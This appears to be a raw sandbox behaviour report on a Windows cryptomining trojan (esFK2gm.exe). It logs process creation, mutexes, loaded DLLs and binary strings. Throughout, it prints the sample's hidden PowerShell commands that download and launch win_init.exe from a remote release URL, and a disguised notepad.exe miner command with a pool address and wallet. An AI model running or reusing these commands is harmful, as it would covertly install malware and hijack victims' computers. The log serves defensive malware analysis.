                          Source: win_init.exe.5.drStatic PE information: Section: /78 ZLIB complexity 0.9914014862804879
                          Source: classification engineClassification label: mal100.troj.evad.mine.winEXE@55/24@5/6
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\win_init.exeJump to behavior
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6032:120:WilError_03
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5596:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1928:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1552:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4584:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4368:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6608:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5500:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7096:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1732:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6988:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7052:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1856:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2296:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5216:120:WilError_03
                          Source: C:\Users\user\Desktop\esFK2gm.exeFile created: C:\Users\user~1\AppData\Local\Temp\fallenminer.lockJump to behavior
                          Source: esFK2gm.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE ProcessId = 7076
                          Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE ProcessId = 7076
                          Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE ProcessId = 7076
                          Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE ProcessId = 7076
                          Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE ProcessId = 7076
                          Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE ProcessId = 7076
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
                          Source: C:\Users\user\Desktop\esFK2gm.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                          Source: esFK2gm.exeVirustotal: Detection: 22%
                          Source: esFK2gm.exeReversingLabs: Detection: 23%
                          Source: esFK2gm.exeString found in binary or memory: _cgo_pthread_key_created missingruntime: sudog with non-nil elemruntime: sudog with non-nil nextruntime: sudog with non-nil prevruntime: mcall function returnedruntime: newstack called from g=runtime: stack split at bad timepanic while printing panic valueruntime: setevent failed; errno=runtime.semasleep wait_abandonedgo package net: hostLookupOrder(chacha20poly1305: bad key lengthtls: unknown Renegotiation valuetls: NextProtos values too largemime: expected token after slashbufio: invalid use of UnreadBytebufio: tried to fill full bufferuse of closed network connection" not supported for cpu option "unexpected character, want coloned25519: bad public key length: x509: unsupported elliptic curvex509: invalid constraint value: x509: malformed subjectPublicKeyx509: cannot parse rfc822Name %qx509: ECDSA verification failurecrypto/aes: input not full blockcrypto/des: input not full blockcrypto/ecdh: invalid private keyinput overflows the modulus sizeinteger is not minimally encodedcannot represent time as UTCTimechacha20: invalid buffer overlapCryptAcquireCertificatePrivateKeyGetVolumeNameForVolumeMountPointWInitializeProcThreadAttributeListSetupDiGetDeviceRegistryPropertyWSetupDiSetDeviceRegistryPropertyWbytes.Buffer.Grow: negative countpseudo header field after regularhttp: invalid Read on closed Bodynet/http: skip alternate protocolinvalid header field value for %qpad size larger than data payloadframe_pushpromise_promiseid_shorthttp2: invalid pseudo headers: %vconnection not allowed by rulesetinvalid username/password versionunsupported transfer encoding: %qbytes.Reader.Seek: invalid whencerelease of handle with refcount 0too many levels of symbolic links142108547152020037174224853515625710542735760100185871124267578125reflect: slice index out of range of method on nil interface valuereflect: Field index out of rangereflect: array index out of range to pointer to array with length sync: RUnlock of unlocked RWMutexslice bounds out of range [%x:%y]base outside usable address spaceruntime: memory allocated by OS [misrounded allocation in sysAllocconcurrent map read and map writeruntime: failed to decommit pages/cpu/classes/gc/pause:cpu-seconds/cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2runtime: failed mSpanList.insert runtime: castogscanstatus oldval=stoplockedm: inconsistent lockingfindrunnable: negative nmspinningfreeing stack not in a stack spanstackalloc not on scheduler stackruntime: goroutine stack exceeds runtime: text offset out of rangetimer period must be non-negativetoo many concurrent timer firingsruntime: name offset out of rangeruntime: type offset out of rangego package net: confVal.netCgo = tls: failed to write to key log: tls: invalid server finished hashtls: unexpected ServerKeyExchangeskip everything and stop the walkempty hex number for chunk len
                          Source: esFK2gm.exeString found in binary or memory: _cgo_pthread_key_created missingruntime: sudog with non-nil elemruntime: sudog with non-nil nextruntime: sudog with non-nil prevruntime: mcall function returnedruntime: newstack called from g=runtime: stack split at bad timepanic while printing panic valueruntime: setevent failed; errno=runtime.semasleep wait_abandonedgo package net: hostLookupOrder(chacha20poly1305: bad key lengthtls: unknown Renegotiation valuetls: NextProtos values too largemime: expected token after slashbufio: invalid use of UnreadBytebufio: tried to fill full bufferuse of closed network connection" not supported for cpu option "unexpected character, want coloned25519: bad public key length: x509: unsupported elliptic curvex509: invalid constraint value: x509: malformed subjectPublicKeyx509: cannot parse rfc822Name %qx509: ECDSA verification failurecrypto/aes: input not full blockcrypto/des: input not full blockcrypto/ecdh: invalid private keyinput overflows the modulus sizeinteger is not minimally encodedcannot represent time as UTCTimechacha20: invalid buffer overlapCryptAcquireCertificatePrivateKeyGetVolumeNameForVolumeMountPointWInitializeProcThreadAttributeListSetupDiGetDeviceRegistryPropertyWSetupDiSetDeviceRegistryPropertyWbytes.Buffer.Grow: negative countpseudo header field after regularhttp: invalid Read on closed Bodynet/http: skip alternate protocolinvalid header field value for %qpad size larger than data payloadframe_pushpromise_promiseid_shorthttp2: invalid pseudo headers: %vconnection not allowed by rulesetinvalid username/password versionunsupported transfer encoding: %qbytes.Reader.Seek: invalid whencerelease of handle with refcount 0too many levels of symbolic links142108547152020037174224853515625710542735760100185871124267578125reflect: slice index out of range of method on nil interface valuereflect: Field index out of rangereflect: array index out of range to pointer to array with length sync: RUnlock of unlocked RWMutexslice bounds out of range [%x:%y]base outside usable address spaceruntime: memory allocated by OS [misrounded allocation in sysAllocconcurrent map read and map writeruntime: failed to decommit pages/cpu/classes/gc/pause:cpu-seconds/cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2runtime: failed mSpanList.insert runtime: castogscanstatus oldval=stoplockedm: inconsistent lockingfindrunnable: negative nmspinningfreeing stack not in a stack spanstackalloc not on scheduler stackruntime: goroutine stack exceeds runtime: text offset out of rangetimer period must be non-negativetoo many concurrent timer firingsruntime: name offset out of rangeruntime: type offset out of rangego package net: confVal.netCgo = tls: failed to write to key log: tls: invalid server finished hashtls: unexpected ServerKeyExchangeskip everything and stop the walkempty hex number for chunk len
                          Source: esFK2gm.exeString found in binary or memory: ReadProcessMemory[%v : %x]: [%v] %vSubscribeServiceChangeNotificationshttp: server closed idle connectionCONTINUATION frame with stream ID 02006-01-02T15:04:05.999999999Z07:00strings.Reader.Seek: invalid whencecrypto/md5: invalid hash state sizenetwork dropped connection on resettransport endpoint is not connectedexecutable file not found in %PATH%1776356839400250464677810668945312588817841970012523233890533447265625ryuFtoaFixed32 called with prec > 9reflect.MakeSlice of non-slice typepersistentalloc: align is too large/memory/classes/heap/released:bytesgreyobject: obj not pointer-alignedmismatched begin/end of activeSweepmheap.freeSpanLocked - invalid freefailed to get or create weak handleattempt to clear non-empty span setruntime: close polldesc w/o unblockruntime: inconsistent read deadlineNtCreateWaitCompletionPacket failedfindrunnable: netpoll with spinningpidleput: P has non-empty run queuetraceback did not unwind completelyruntime: createevent failed; errno=unsupported signature algorithm: %vtls: too many non-advancing recordstls: server selected an invalid PSKtls: invalid Kyber server key sharemime: bogus characters after %%: %qhpack: invalid Huffman-encoded datadynamic table size update too largefile type does not support deadline'_' must separate successive digitshash/crc32: invalid hash state sizetoo many Questions to pack (>65535)bigmod: modulus is smaller than natx509: malformed extension OID fieldx509: wrong Ed25519 public key sizex509: invalid authority info accessmlkem768: invalid ciphertext lengthflate: corrupt input before offset P224 point is the point at infinityP256 point is the point at infinityP384 point is the point at infinityP521 point is the point at infinitysuperfluous leading zeros in lengthchacha20: output smaller than inputtransform: short destination bufferWriteProcessMemory[%v : %x]: [%v] %vjson: encoding error for type %q: %qhttp: unexpected EOF reading trailer LastStreamID=%v ErrCode=%v Debug=%qRoundTrip retrying after failure: %vno acceptable authentication methodsstrings.Builder.Grow: negative countstrings: Join output length overflowTime.UnmarshalBinary: invalid lengthbytes.Reader.ReadAt: negative offsetbytes.Reader.Seek: negative positionaccessing a corrupted shared libraryfailure to read data directories: %vfail to read section relocations: %vfail to read string table length: %v444089209850062616169452667236328125ryuFtoaFixed64 called with prec > 180123456789abcdefghijklmnopqrstuvwxyzmethod ABI and value ABI don't alignlfstack node allocated from the heap) is larger than maximum page size (key size not a multiple of key alignruntime: invalid typeBitsBulkBarrieruncaching span but s.allocCount == 0/memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime: marked free object in span runtime: unblock on closing polldescruntime: inconsistent write deadlineUnable to determine system directoryruntime: VirtualQuery failed; errno=runtime: sudog with non-nil
                          Source: esFK2gm.exeString found in binary or memory: ReadProcessMemory[%v : %x]: [%v] %vSubscribeServiceChangeNotificationshttp: server closed idle connectionCONTINUATION frame with stream ID 02006-01-02T15:04:05.999999999Z07:00strings.Reader.Seek: invalid whencecrypto/md5: invalid hash state sizenetwork dropped connection on resettransport endpoint is not connectedexecutable file not found in %PATH%1776356839400250464677810668945312588817841970012523233890533447265625ryuFtoaFixed32 called with prec > 9reflect.MakeSlice of non-slice typepersistentalloc: align is too large/memory/classes/heap/released:bytesgreyobject: obj not pointer-alignedmismatched begin/end of activeSweepmheap.freeSpanLocked - invalid freefailed to get or create weak handleattempt to clear non-empty span setruntime: close polldesc w/o unblockruntime: inconsistent read deadlineNtCreateWaitCompletionPacket failedfindrunnable: netpoll with spinningpidleput: P has non-empty run queuetraceback did not unwind completelyruntime: createevent failed; errno=unsupported signature algorithm: %vtls: too many non-advancing recordstls: server selected an invalid PSKtls: invalid Kyber server key sharemime: bogus characters after %%: %qhpack: invalid Huffman-encoded datadynamic table size update too largefile type does not support deadline'_' must separate successive digitshash/crc32: invalid hash state sizetoo many Questions to pack (>65535)bigmod: modulus is smaller than natx509: malformed extension OID fieldx509: wrong Ed25519 public key sizex509: invalid authority info accessmlkem768: invalid ciphertext lengthflate: corrupt input before offset P224 point is the point at infinityP256 point is the point at infinityP384 point is the point at infinityP521 point is the point at infinitysuperfluous leading zeros in lengthchacha20: output smaller than inputtransform: short destination bufferWriteProcessMemory[%v : %x]: [%v] %vjson: encoding error for type %q: %qhttp: unexpected EOF reading trailer LastStreamID=%v ErrCode=%v Debug=%qRoundTrip retrying after failure: %vno acceptable authentication methodsstrings.Builder.Grow: negative countstrings: Join output length overflowTime.UnmarshalBinary: invalid lengthbytes.Reader.ReadAt: negative offsetbytes.Reader.Seek: negative positionaccessing a corrupted shared libraryfailure to read data directories: %vfail to read section relocations: %vfail to read string table length: %v444089209850062616169452667236328125ryuFtoaFixed64 called with prec > 180123456789abcdefghijklmnopqrstuvwxyzmethod ABI and value ABI don't alignlfstack node allocated from the heap) is larger than maximum page size (key size not a multiple of key alignruntime: invalid typeBitsBulkBarrieruncaching span but s.allocCount == 0/memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime: marked free object in span runtime: unblock on closing polldescruntime: inconsistent write deadlineUnable to determine system directoryruntime: VirtualQuery failed; errno=runtime: sudog with non-nil
                          Source: unknownProcess created: C:\Users\user\Desktop\esFK2gm.exe "C:\Users\user\Desktop\esFK2gm.exe"
                          Source: C:\Users\user\Desktop\esFK2gm.exeProcess created: C:\Windows\System32\notepad.exe --donate-level 2 -o 45.144.212.77:3333 -u 494k9WqKJKFGDoD9MfnAcjEDcrHMmMNJTUun8rYFRYyPHyoHMJf5sesH79UoM8VfoGYevyzthG86r5BTGYZxmhENTzKajL3 -k -p x --cpu-max-threads-hint=25
                          Source: unknownProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c start /min powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://github.com/letzchipman7/fallen/releases/download/v1.0.0/win_init.exe' -OutFile 'C:\Users\user\AppData\Roaming\win_init.exe'"
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://github.com/letzchipman7/fallen/releases/download/v1.0.0/win_init.exe' -OutFile 'C:\Users\user\AppData\Roaming\win_init.exe'"
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: unknownProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c start /min powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Start-Sleep -s 30; Start-Process 'C:\Users\user\AppData\Roaming\win_init.exe' -WindowStyle Hidden"
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Start-Sleep -s 30; Start-Process 'C:\Users\user\AppData\Roaming\win_init.exe' -WindowStyle Hidden"
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\Desktop\esFK2gm.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "PID eq 7076"
                          Source: C:\Windows\System32\tasklist.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                          Source: unknownProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c start /min powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://github.com/letzchipman7/fallen/releases/download/v1.0.0/win_init.exe' -OutFile 'C:\Users\user\AppData\Roaming\win_init.exe'"
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://github.com/letzchipman7/fallen/releases/download/v1.0.0/win_init.exe' -OutFile 'C:\Users\user\AppData\Roaming\win_init.exe'"
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
                          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k UnistackSvcGroup
                          Source: unknownProcess created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
                          Source: unknownProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c start /min powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Start-Sleep -s 30; Start-Process 'C:\Users\user\AppData\Roaming\win_init.exe' -WindowStyle Hidden"
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Start-Sleep -s 30; Start-Process 'C:\Users\user\AppData\Roaming\win_init.exe' -WindowStyle Hidden"
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\Desktop\esFK2gm.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "PID eq 7076"
                          Source: C:\Windows\System32\tasklist.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: unknownProcess created: C:\Windows\System32\sppsvc.exe C:\Windows\system32\sppsvc.exe
                          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\win_init.exe "C:\Users\user\AppData\Roaming\win_init.exe"
                          Source: C:\Users\user\Desktop\esFK2gm.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "PID eq 7076"
                          Source: C:\Windows\System32\tasklist.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\win_init.exe "C:\Users\user\AppData\Roaming\win_init.exe"
                          Source: C:\Users\user\Desktop\esFK2gm.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "PID eq 7076"
                          Source: C:\Windows\System32\tasklist.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\Desktop\esFK2gm.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "PID eq 7076"
                          Source: C:\Windows\System32\tasklist.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\Desktop\esFK2gm.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "PID eq 7076"
                          Source: C:\Windows\System32\tasklist.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                          Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\Desktop\esFK2gm.exeProcess created: C:\Windows\System32\notepad.exe --donate-level 2 -o 45.144.212.77:3333 -u 494k9WqKJKFGDoD9MfnAcjEDcrHMmMNJTUun8rYFRYyPHyoHMJf5sesH79UoM8VfoGYevyzthG86r5BTGYZxmhENTzKajL3 -k -p x --cpu-max-threads-hint=25Jump to behavior
                          Source: C:\Users\user\Desktop\esFK2gm.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "PID eq 7076"Jump to behavior
                          Source: C:\Users\user\Desktop\esFK2gm.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "PID eq 7076"Jump to behavior
                          Source: C:\Users\user\Desktop\esFK2gm.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "PID eq 7076"Jump to behavior
                          Source: C:\Users\user\Desktop\esFK2gm.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "PID eq 7076"Jump to behavior
                          Source: C:\Users\user\Desktop\esFK2gm.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "PID eq 7076"Jump to behavior
                          Source: C:\Users\user\Desktop\esFK2gm.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "PID eq 7076"Jump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://github.com/letzchipman7/fallen/releases/download/v1.0.0/win_init.exe' -OutFile 'C:\Users\user\AppData\Roaming\win_init.exe'"Jump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Start-Sleep -s 30; Start-Process 'C:\Users\user\AppData\Roaming\win_init.exe' -WindowStyle Hidden"Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\win_init.exe "C:\Users\user\AppData\Roaming\win_init.exe" Jump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://github.com/letzchipman7/fallen/releases/download/v1.0.0/win_init.exe' -OutFile 'C:\Users\user\AppData\Roaming\win_init.exe'"
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Start-Sleep -s 30; Start-Process 'C:\Users\user\AppData\Roaming\win_init.exe' -WindowStyle Hidden"
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\win_init.exe "C:\Users\user\AppData\Roaming\win_init.exe"
                          Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenableJump to behavior
                          Source: C:\Users\user\Desktop\esFK2gm.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\Desktop\esFK2gm.exeSection loaded: powrprof.dllJump to behavior
                          Source: C:\Users\user\Desktop\esFK2gm.exeSection loaded: umpdc.dllJump to behavior
                          Source: C:\Users\user\Desktop\esFK2gm.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\esFK2gm.exeSection loaded: dhcpcsvc6.dllJump to behavior
                          Source: C:\Users\user\Desktop\esFK2gm.exeSection loaded: dhcpcsvc.dllJump to behavior
                          Source: C:\Users\user\Desktop\esFK2gm.exeSection loaded: dnsapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\esFK2gm.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Users\user\Desktop\esFK2gm.exeSection loaded: rasadhlp.dllJump to behavior
                          Source: C:\Users\user\Desktop\esFK2gm.exeSection loaded: fwpuclnt.dllJump to behavior
                          Source: C:\Users\user\Desktop\esFK2gm.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Users\user\Desktop\esFK2gm.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Users\user\Desktop\esFK2gm.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Users\user\Desktop\esFK2gm.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Users\user\Desktop\esFK2gm.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Windows\System32\notepad.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Windows\System32\notepad.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Windows\System32\notepad.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Windows\System32\notepad.exeSection loaded: powrprof.dllJump to behavior
                          Source: C:\Windows\System32\notepad.exeSection loaded: umpdc.dllJump to behavior
                          Source: C:\Windows\System32\notepad.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Windows\System32\notepad.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Windows\System32\notepad.exeSection loaded: dhcpcsvc6.dllJump to behavior
                          Source: C:\Windows\System32\notepad.exeSection loaded: dhcpcsvc.dllJump to behavior
                          Source: C:\Windows\System32\notepad.exeSection loaded: dnsapi.dllJump to behavior
                          Source: C:\Windows\System32\notepad.exeSection loaded: napinsp.dllJump to behavior
                          Source: C:\Windows\System32\notepad.exeSection loaded: pnrpnsp.dllJump to behavior
                          Source: C:\Windows\System32\notepad.exeSection loaded: wshbth.dllJump to behavior
                          Source: C:\Windows\System32\notepad.exeSection loaded: nlaapi.dllJump to behavior
                          Source: C:\Windows\System32\notepad.exeSection loaded: winrnr.dllJump to behavior
                          Source: C:\Windows\System32\notepad.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\System32\notepad.exeSection loaded: explorerframe.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
